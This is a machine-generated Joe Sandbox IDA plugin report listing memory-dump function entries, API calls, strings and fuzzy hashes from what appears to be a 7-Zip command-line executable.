                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: DirectoryRemovefree
                                                                • String ID:
                                                                • API String ID: 736856642-0
                                                                • Opcode ID: efb7360f27999ac7bd03661593c0501c8d3dd599b59c9a8bab47d3410f2a5fdb
                                                                • Instruction ID: 7161c153926bf0362d6d5723c8113609c3ea39bfea093d699a232ebf64f1d118
                                                                • Opcode Fuzzy Hash: efb7360f27999ac7bd03661593c0501c8d3dd599b59c9a8bab47d3410f2a5fdb
                                                                • Instruction Fuzzy Hash: EEF0866720464886C938AB2199503BD57249B967F8F480331DEA9476A5DF26C9C68700
                                                                APIs
                                                                • _CxxThrowException.MSVCRT ref: 00112F5B
                                                                  • Part of subcall function 00112130: malloc.MSVCRT ref: 00112134
                                                                  • Part of subcall function 00112130: _CxxThrowException.MSVCRT ref: 0011214F
                                                                • memmove.MSVCRT(?,Unsupported switch postfix -stm,00000000,0011302B,?,?,?,?,00113698), ref: 00112F2C
                                                                • free.MSVCRT ref: 00112F34
                                                                Strings
                                                                • Unsupported switch postfix -stm, xrefs: 00112EF6
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: ExceptionThrow$freemallocmemmove
                                                                • String ID: Unsupported switch postfix -stm
                                                                • API String ID: 3321538808-3553869907
                                                                • Opcode ID: 79aff19e84f71c5e943c7f2cebb507195fcbf850f662f6b8687f40e2979c5786
                                                                • Instruction ID: f60e9fab8d2a384a0189d239fda26d9ff707530b8fa361b6263cba42806ddd59
                                                                • Opcode Fuzzy Hash: 79aff19e84f71c5e943c7f2cebb507195fcbf850f662f6b8687f40e2979c5786
                                                                • Instruction Fuzzy Hash: 8EF0CD7670028586DA2CDF8AE4902ADA361EB957E0F148030EB9A0BB11CB39D8D68B00
                                                                APIs
                                                                • _CxxThrowException.MSVCRT ref: 00112AFD
                                                                  • Part of subcall function 00112130: malloc.MSVCRT ref: 00112134
                                                                  • Part of subcall function 00112130: _CxxThrowException.MSVCRT ref: 0011214F
                                                                • memmove.MSVCRT ref: 00112ACE
                                                                • free.MSVCRT ref: 00112AD6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: ExceptionThrow$freemallocmemmove
                                                                • String ID: (LP-
                                                                • API String ID: 3321538808-3833670221
                                                                • Opcode ID: 5d4d380ffa6524cac6d63a35271a780ed9a8549063819f503eb306886d5a4236
                                                                • Instruction ID: cc8037fbc347df45132046e2878ba2d68535c22ca53e4c146e4b74720e9c9ae0
                                                                • Opcode Fuzzy Hash: 5d4d380ffa6524cac6d63a35271a780ed9a8549063819f503eb306886d5a4236
                                                                • Instruction Fuzzy Hash: F6F0F07270024586DA28DF4AF8902ADB321EB987D4F14C030EF9907B10DB38C8DA8B00
                                                                APIs
                                                                • memmove.MSVCRT ref: 00153E51
                                                                  • Part of subcall function 00152B60: CompareFileTime.KERNEL32(?,?,?,00000000,00153E64), ref: 00152BA5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: CompareFileTimememmove
                                                                • String ID: alternate streams$files$streams
                                                                • API String ID: 1303509325-806849385
                                                                • Opcode ID: be883e452b7650b9078f8113c3e616bbeedde65b08412c4df6c6f1594ccd81f0
                                                                • Instruction ID: b7768aa7e96279e2d1ae72664d5a7c95504ffdf8a13a07e3afbbb56e08308f53
                                                                • Opcode Fuzzy Hash: be883e452b7650b9078f8113c3e616bbeedde65b08412c4df6c6f1594ccd81f0
                                                                • Instruction Fuzzy Hash: 8BF062623105A9A2EB24EB66E915BD96321FB55BC5FC05013AE2C0BE549F38C3AEC740
                                                                APIs
                                                                • FormatMessageW.KERNEL32 ref: 00116676
                                                                  • Part of subcall function 0011339C: free.MSVCRT ref: 001133D7
                                                                  • Part of subcall function 0011339C: memmove.MSVCRT(00000000,?,?,00000000,001110A8), ref: 001133F2
                                                                • LocalFree.KERNEL32 ref: 00116698
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: FormatFreeLocalMessagefreememmove
                                                                • String ID: Error #
                                                                • API String ID: 2451246624-1299485822
                                                                • Opcode ID: 99fd73fc856dad1e88b4ccb444db1a8165f30a332f2d2e9cd02aa09722ea5f5f
                                                                • Instruction ID: a254dcfe6548a6a11f53673a3dee4a5e0240618f7a73421cedc1b6d93f36e9b2
                                                                • Opcode Fuzzy Hash: 99fd73fc856dad1e88b4ccb444db1a8165f30a332f2d2e9cd02aa09722ea5f5f
                                                                • Instruction Fuzzy Hash: 5F21233221468086CB28CF15E4417DE77B1E3D57A4F848236DA988B798EF79C1C8CB10
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: UNC
                                                                • API String ID: 0-337201128
                                                                • Opcode ID: caa09ef79893b1e0c723e2139b0e345877b12b567cf7e66d5e2a6cc5cce0967e
                                                                • Instruction ID: 2025a617a4597a73163fca935eafadf352d8548038ecd4f0866010c1845a13dd
                                                                • Opcode Fuzzy Hash: caa09ef79893b1e0c723e2139b0e345877b12b567cf7e66d5e2a6cc5cce0967e
                                                                • Instruction Fuzzy Hash: E0213E76340A45C7DB28CB56E4807E92360EB88F9AF569037CF4A4B720EB3AC8C5C705
                                                                APIs
                                                                • fputs.MSVCRT ref: 00150661
                                                                • free.MSVCRT ref: 00150680
                                                                  • Part of subcall function 0015B1C8: memset.MSVCRT ref: 0015B20D
                                                                  • Part of subcall function 0015B1C8: fputs.MSVCRT ref: 0015B232
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputs$freememset
                                                                • String ID: ERROR:
                                                                • API String ID: 2276422817-977468659
                                                                • Opcode ID: 9885eecbbf6ca8fc6e066b44c4d0d806fd7fb2900e3a304f7a56ab35e13a5ef5
                                                                • Instruction ID: 6f2c58c9628f5cde40552e8e988b7314d955d5d143ed2612dd96521c5be0ef1b
                                                                • Opcode Fuzzy Hash: 9885eecbbf6ca8fc6e066b44c4d0d806fd7fb2900e3a304f7a56ab35e13a5ef5
                                                                • Instruction Fuzzy Hash: 78118262211A0482DA29EB62ED553AE6320FBD9BE1F084635EE7B4B791DF3CC4D5C344
                                                                APIs
                                                                • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0011B4AA
                                                                • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0011B4F8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: QueryValue
                                                                • String ID: Path64
                                                                • API String ID: 3660427363-321863482
                                                                • Opcode ID: ce2d8586953f7850c663cd00a09a8bd9eb970d832503358bfea85760a13bb2cd
                                                                • Instruction ID: 050f8f9cd4e8fd90e44bc47c1101f695be7ab496c7795e72973c8aa791a95b87
                                                                • Opcode Fuzzy Hash: ce2d8586953f7850c663cd00a09a8bd9eb970d832503358bfea85760a13bb2cd
                                                                • Instruction Fuzzy Hash: D5216D76619600C7EB14CF25E49475E73A1F794B84F20902AEB8A07BA8DB38C885CF40
                                                                APIs
                                                                Strings
                                                                • Can not open the file as archive, xrefs: 001542D8
                                                                • Can not open encrypted archive. Wrong password?, xrefs: 00154297
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputs
                                                                • String ID: Can not open encrypted archive. Wrong password?$Can not open the file as archive
                                                                • API String ID: 1795875747-2399861261
                                                                • Opcode ID: 149c3983409531ef4f283d50ab509c3b453b3246c3b38dfffb22ccf5e133ea28
                                                                • Instruction ID: 178c464285ba98041c2e14df02c37622751404a325a7e002e389c20d8c49298d
                                                                • Opcode Fuzzy Hash: 149c3983409531ef4f283d50ab509c3b453b3246c3b38dfffb22ccf5e133ea28
                                                                • Instruction Fuzzy Hash: C8018F62320655D3EF18AF26E84039D1321BB59BC6F54A032EE2A4B344CF3DC4E9C301
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: wcscmp
                                                                • String ID: \??\
                                                                • API String ID: 3392835482-3047946824
                                                                • Opcode ID: 877544d1592a68484731fd63782ff1f2adae2ffaa1fbb9196b429caabd26276c
                                                                • Instruction ID: 5616de9ecd104072a22c552886a08cd1a55e625134482d20382160e9af8d1895
                                                                • Opcode Fuzzy Hash: 877544d1592a68484731fd63782ff1f2adae2ffaa1fbb9196b429caabd26276c
                                                                • Instruction Fuzzy Hash: 22F09062204944D2DE18DB2AEAB03ED1321FB94B86F905436CB6A47A14CF20D4FBC311
                                                                APIs
                                                                • fputs.MSVCRT ref: 0015B7E4
                                                                  • Part of subcall function 00112300: fputc.MSVCRT ref: 00112311
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputcfputs
                                                                • String ID: Scan $Scanning the drive:
                                                                • API String ID: 269475090-1085461122
                                                                • Opcode ID: 4a104878c2e5f0d323a3430e672efaa3bd5f76afab79e0bd6a72b63798dffa16
                                                                • Instruction ID: 421b6ba834c3317e1113539e9fafe50469116370ecab3da88fade02a3206eb72
                                                                • Opcode Fuzzy Hash: 4a104878c2e5f0d323a3430e672efaa3bd5f76afab79e0bd6a72b63798dffa16
                                                                • Instruction Fuzzy Hash: 28E08675301D4181DE05DF29DE853DC1321AB98BE9F955431DE1D4B264EF28C5DAC310
                                                                APIs
                                                                • free.MSVCRT ref: 0013ECEE
                                                                • free.MSVCRT ref: 0013ECF6
                                                                • free.MSVCRT ref: 0013EFE3
                                                                • free.MSVCRT ref: 0013EFEB
                                                                  • Part of subcall function 00114D78: free.MSVCRT ref: 00114DBC
                                                                  • Part of subcall function 00114D78: free.MSVCRT ref: 00114DC4
                                                                  • Part of subcall function 00114D78: free.MSVCRT ref: 00114EAC
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 2568c4c8a93fed0a7db5756fe4b5abc77c557bdbfdb6e41abb2639136c3796b8
                                                                • Instruction ID: 706e33eaf8913faba5df13d492cc6ad536bf2b718d060cd062f7c07d0491b104
                                                                • Opcode Fuzzy Hash: 2568c4c8a93fed0a7db5756fe4b5abc77c557bdbfdb6e41abb2639136c3796b8
                                                                • Instruction Fuzzy Hash: 56A1F032314B81D6DB28DF26D4843AE77A1F794B90F044126EF9E477A5EB79C895C700
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$memmove
                                                                • String ID:
                                                                • API String ID: 1534225298-0
                                                                • Opcode ID: 690fc6323045f1499638e60008430e199e5b92b8d4d6359a2f546a67527e5006
                                                                • Instruction ID: f6c5f1c3b959383561c2ccbd0bc138e31da6cd6d20d3519f7a5ab1552f68a665
                                                                • Opcode Fuzzy Hash: 690fc6323045f1499638e60008430e199e5b92b8d4d6359a2f546a67527e5006
                                                                • Instruction Fuzzy Hash: 4F418422218E80D68B18EF22E4910AEB762F7D1FE47544231EB6A17769DB74C8D6C704
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 2d395fef6bf6d2161f205ad2dbd11117f8f32b2c6da05af5b4328dea44ce9941
                                                                • Instruction ID: 9cdd4635dc1af990a8cf8745234dcc8c1bca2025da034f2247a625b1a9f2d79b
                                                                • Opcode Fuzzy Hash: 2d395fef6bf6d2161f205ad2dbd11117f8f32b2c6da05af5b4328dea44ce9941
                                                                • Instruction Fuzzy Hash: 5641816650C6C485CA75CB21A054AEEBB75F3E6785F865106EBC953B2ACF38C8D4CB40
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 323c9969710448a883c5df48d84fecfab0fddd235bddb9be855929d7e43add65
                                                                • Instruction ID: 52eb2960e8c2d81f9a72a3550ee3c4896932202a0a3141e8037dbb8444466a59
                                                                • Opcode Fuzzy Hash: 323c9969710448a883c5df48d84fecfab0fddd235bddb9be855929d7e43add65
                                                                • Instruction Fuzzy Hash: 2F31D4776156A08ACB25EF25B4406A97760F7C8BE4F184236EEAA477D8DB34C862C710
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$memmove
                                                                • String ID:
                                                                • API String ID: 1534225298-0
                                                                • Opcode ID: 35a1d6c259a3625b378e1dffe93dee20d714f09e6227e3efd6c4fd439d23f854
                                                                • Instruction ID: 58b2e59f3386e5b1f01f51e03acfafc63c29ecc383713bd8325bc4d1f3658c36
                                                                • Opcode Fuzzy Hash: 35a1d6c259a3625b378e1dffe93dee20d714f09e6227e3efd6c4fd439d23f854
                                                                • Instruction Fuzzy Hash: A0210563301B8099DB19AF26EC5576A6754BF55B94F9C8138EFA90B380DF78C886C312
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$memmove
                                                                • String ID:
                                                                • API String ID: 1534225298-0
                                                                • Opcode ID: 907a790e22709f66cba6a81009bdf1bb2919779642d070dbe716919cc3937b99
                                                                • Instruction ID: 1140776c8c5cee6823e5aee3744fc53b089a069d39f0649ee2b7a5eec4e0e038
                                                                • Opcode Fuzzy Hash: 907a790e22709f66cba6a81009bdf1bb2919779642d070dbe716919cc3937b99
                                                                • Instruction Fuzzy Hash: 1721B237612A9486CB29DF26D4107A97361E795FE4B098234DE6D0B398DF38C8C2C354
                                                                APIs
                                                                • EnterCriticalSection.KERNEL32 ref: 0012779B
                                                                • LeaveCriticalSection.KERNEL32 ref: 001277A7
                                                                • EnterCriticalSection.KERNEL32 ref: 0012783C
                                                                • LeaveCriticalSection.KERNEL32 ref: 00127848
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$EnterLeave
                                                                • String ID:
                                                                • API String ID: 3168844106-0
                                                                • Opcode ID: 905f98d841eae4ab66d526709c79df53eb5328ecb6ed6fba7ada2edbd53a37aa
                                                                • Instruction ID: da628bdad28b83d77a1065057d1f00f4bfda4d65148f3e0d1e38453a19eacf6f
                                                                • Opcode Fuzzy Hash: 905f98d841eae4ab66d526709c79df53eb5328ecb6ed6fba7ada2edbd53a37aa
                                                                • Instruction Fuzzy Hash: 5F210336604B5097CB209F2AE98425A7370F789B99F195126EB4D47B94DF38D8A5C700
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$ExceptionThrowmalloc
                                                                • String ID:
                                                                • API String ID: 2043655614-0
                                                                • Opcode ID: 599e7315893330928f463c9da471a6a003b51d38736cd83a9fad199d7e4e3aaa
                                                                • Instruction ID: f7f09293ad0920a40fbfaac8edd8195b9cb99053c05a2e565027f2dabd881536
                                                                • Opcode Fuzzy Hash: 599e7315893330928f463c9da471a6a003b51d38736cd83a9fad199d7e4e3aaa
                                                                • Instruction Fuzzy Hash: D9115E72615B8081CB64DF25E88135D73A5F795BE4F248236EB9D077A8DF38C8A5C740
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: memcmp
                                                                • String ID:
                                                                • API String ID: 1475443563-0
                                                                • Opcode ID: 26e0d05632ee771259b6d8779e1bb14a2af1a10e0c5519a103b38d64912a3de7
                                                                • Instruction ID: 580a15f51fe16e9db4f287a7a55a79cc177d32ffd76189c85626a23e487d629f
                                                                • Opcode Fuzzy Hash: 26e0d05632ee771259b6d8779e1bb14a2af1a10e0c5519a103b38d64912a3de7
                                                                • Instruction Fuzzy Hash: D901F5B2309B41D6FB089F2AAC923E822559B19FC6F855430CE158F345FF38DA4AC300
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: memcmp
                                                                • String ID:
                                                                • API String ID: 1475443563-0
